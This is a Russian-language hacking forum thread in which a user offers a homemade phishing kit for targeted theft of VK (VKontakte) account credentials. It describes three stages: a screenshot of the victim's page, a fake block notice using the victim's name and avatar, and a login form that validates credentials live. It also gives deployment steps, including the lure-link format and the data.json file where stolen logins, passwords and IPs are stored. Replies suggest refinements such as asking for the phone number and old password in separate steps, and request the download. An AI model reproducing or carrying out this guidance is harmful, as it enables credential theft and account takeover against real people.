РЕКЛАМА НА ФОРУМЕ 

РЕКЛАМА НА ФОРУМЕ MultiVPN РЕКЛАМА НА ФОРУМЕ

Фейк Фейк для целевой атаки на ВК с автозабором данных

Сообщения
91
Реакции
67
Баллы
23
Здравствуйте!
Завалялась недавняя собственная разработка для одной целевой атаки (подобный фейк активно используется "взломщиками", с ценником от 3500р и выше, разной степени наглости), а некоторые им даже барыжат.

Работа фейка разделена на три стадии :

Стадия I - жертва переходит по ссылке "взломщика" и видит свою страницу на 1.5 сек (было сделано исходя из гипотезы, что человек увидев "свое" подсознательно повысит уровень доверия). Через 1.5 сек происходит редирект на стадию II

Стадия II - жертва видит форму, со случайно созданным временем (время останется одно и то же, для последующих визитов), и стандартную форму ВК о блокировке страницы за рассылку спама (см. скриншот под спойлером). Фейк сам распарсит страницу жертвы по переданному в ссылке ID, заберет оттуда имя и аватарку



Стадия III - жертве предлагается ввести логин и пароль для подтверждения доступа (во избежание бана). Присутствует валидация - при неправильно введенном логине и пароле поля подсветятся красноватым (как в оригинальном ВК), пропустит только правильный логин/пароль. После ввода, жертва будет направлена на оригинальный контакт (и выдохнет с облегчением)

После того, как жертва поведется на фейк есть шанс что она побежит менять логин-пароль, поэтому форму можно легко переделать под смену пароля


Как использовать фейк :

Заливаем на хостинг, даем файлам необходимые права.
Жертве даем ссылку вида : yoursite.com/user.php?id={USER_ID}&to=validation, где вместо {USER_ID} - id'шник жертвы (только цифры! без приставки id и спецадресов типа durov)

Нужно заметить несколько пунктов :

- Свою страницу жертва видит через api скриншотера веб-страниц, при первом визите скриншотер может думать долго, поэтому лучше "прогреть кэш"- зайти сначала самому, и далее он будет работать мгновенно
- Для скриншотера нужен api key, менять его в файле user.php, строка 5 ($screenshot_key=), для удобства я приложил тестовый, в крайнем случае можно использовать его​

-Фейк был частью системы фейков, поэтому админку не прикладываю. Логины-пароли-IP будут в файлике data.json, его лучше предварительно закрыть с помощью .htaccess
-Пользователь после успешной авторизации больше не сможет посетить фейк, устанавливается кука при наличии которой его будет сразу перенаправлять на vk.com/support

[hide=30]
http://s000.tinyupload.com/?file_id=07284682225182658788
[/hide]​
 
Сообщения
13
Реакции
1
Баллы
3
После того, как жертва поведется на фейк есть шанс что она побежит менять логин-пароль

100% жертва побежит менять пароль)
 
Сообщения
4
Реакции
0
Баллы
1
Нужно что бы ей автоматически предложило сменить пароль на новый
 
Сообщения
33
Реакции
0
Баллы
11
каееф:ilthis:
[doublepost=1484860411][/doublepost]слушай...заколебешься тут 30 лайков набирать, давай куплю, так быстрее
 
Сообщения
332
Реакции
157
Баллы
58
После того, как жертва поведется на фейк есть шанс что она побежит менять логин-пароль

100% жертва побежит менять пароль)
Нет, такое бывает не часто. Вот только если способа входа в чужой вк не знаешь, тогда нету смысла пытаться ломать
 
Сообщения
18
Реакции
10
Баллы
3
Понравилось 1.5 секунд. Можно попробовать просить логин и пароль не сразу а по отдельности.
Введите ваш номер телефона который привязан к странице > Это вы? (Показываем имя и фото цели) > Введите ваш старый пароль > Меняем и запоминаем новый пароль.
 
Сообщения
11
Реакции
1
Баллы
3
Здравствуйте!
Завалялась недавняя собственная разработка для одной целевой атаки (подобный фейк активно используется "взломщиками", с ценником от 3500р и выше, разной степени наглости), а некоторые им даже барыжат.

Работа фейка разделена на три стадии :

Стадия I - жертва переходит по ссылке "взломщика" и видит свою страницу на 1.5 сек (было сделано исходя из гипотезы, что человек увидев "свое" подсознательно повысит уровень доверия). Через 1.5 сек происходит редирект на стадию II

Стадия II - жертва видит форму, со случайно созданным временем (время останется одно и то же, для последующих визитов), и стандартную форму ВК о блокировке страницы за рассылку спама (см. скриншот под спойлером). Фейк сам распарсит страницу жертвы по переданному в ссылке ID, заберет оттуда имя и аватарку


Стадия III - жертве предлагается ввести логин и пароль для подтверждения доступа (во избежание бана). Присутствует валидация - при неправильно введенном логине и пароле поля подсветятся красноватым (как в оригинальном ВК), пропустит только правильный логин/пароль. После ввода, жертва будет направлена на оригинальный контакт (и выдохнет с облегчением)

После того, как жертва поведется на фейк есть шанс что она побежит менять логин-пароль, поэтому форму можно легко переделать под смену пароля


Как использовать фейк :

Заливаем на хостинг, даем файлам необходимые права.
Жертве даем ссылку вида : yoursite.com/user.php?id={USER_ID}&to=validation, где вместо {USER_ID} - id'шник жертвы (только цифры! без приставки id и спецадресов типа durov)

Нужно заметить несколько пунктов :

- Свою страницу жертва видит через api скриншотера веб-страниц, при первом визите скриншотер может думать долго, поэтому лучше "прогреть кэш"- зайти сначала самому, и далее он будет работать мгновенно
- Для скриншотера нужен api key, менять его в файле user.php, строка 5 ($screenshot_key=), для удобства я приложил тестовый, в крайнем случае можно использовать его

-Фейк был частью системы фейков, поэтому админку не прикладываю. Логины-пароли-IP будут в файлике data.json, его лучше предварительно закрыть с помощью .htaccess
-Пользователь после успешной авторизации больше не сможет посетить фейк, устанавливается кука при наличии которой его будет сразу перенаправлять на vk.com/support

***Скрытый текст не может быть процитирован.***
Скинь фейк-плиззз,симпатий век ждать...
 
Сообщения
25
Реакции
7
Баллы
3
Выложил бы без Хайда. Народ просит, это же не приват софт.
 
Сообщения
27
Реакции
0
Баллы
1
А форма для смены пароля есть? Или самому допилить?
 
Сообщения
42
Реакции
1
Баллы
13
Тоже очень хочу посмотреть на данное чудо! Можно личный?
 
Сверху